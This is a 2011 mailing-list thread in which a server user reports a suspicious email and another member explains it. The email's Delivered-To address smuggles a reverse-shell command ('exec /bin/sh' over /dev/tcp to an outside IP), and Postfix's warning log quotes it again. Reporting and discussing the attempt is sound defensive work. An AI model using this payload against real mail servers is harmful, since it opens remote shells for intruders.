11 Feb
2011
11 Feb
'11
11:07 a.m.
It seems the user was trying to get a shell delivered to there TCP stream. I
have heard of an exploit like this, it was plugged quite quickly though so
as long as you are up to date you should be fine.
By the looks of it postfix blocked it as an illegal address so I wouldn't
worry too much, it will have delivered it as a normal email :)
Daniel
On 11 February 2011 09:29, Alastair Sherringham <sherringham(a)gmail.com>wrote;wrote:
I received an interesting email today. I only noticed
because I had
logged in SSH and got the "you have new email" message. Reading via
"mail", I see :
Delivered-To: "root+:|exec /bin/sh 0</dev/tcp/87.106.250.176/45295
1>&0 2>&0"(a)calliope.bitfolk
Obviously some sort of possible exploit. The IP address 87.106.250.176
is Germany (1&1 Internet).
Postfix reported :
warning: 36FE51381A3: address with illegal extension: root+:|exec
/bin/sh 0</dev/tcp/87.106.250.176/45295 1>&0 2>&0
But it was delivered. I hope nothing bad has happened. I am running
AIDE as we speak and digging around).
Cheers,
--
Alastair Sherringham
http://www.sherringham.net
_______________________________________________
users mailing list
users(a)lists.bitfolk.com
https://lists.bitfolk.com/mailman/listinfo/users